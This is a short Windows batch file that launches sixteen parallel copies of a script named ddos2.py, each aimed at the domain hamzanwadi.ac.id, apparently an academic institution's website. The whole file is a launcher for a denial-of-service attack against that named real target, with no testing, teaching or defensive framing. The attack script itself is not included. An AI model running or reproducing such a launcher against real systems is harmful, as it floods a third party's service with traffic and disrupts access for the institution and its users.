@echo off

start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"
start cmd /k "python ddos2.py hamzanwadi.ac.id"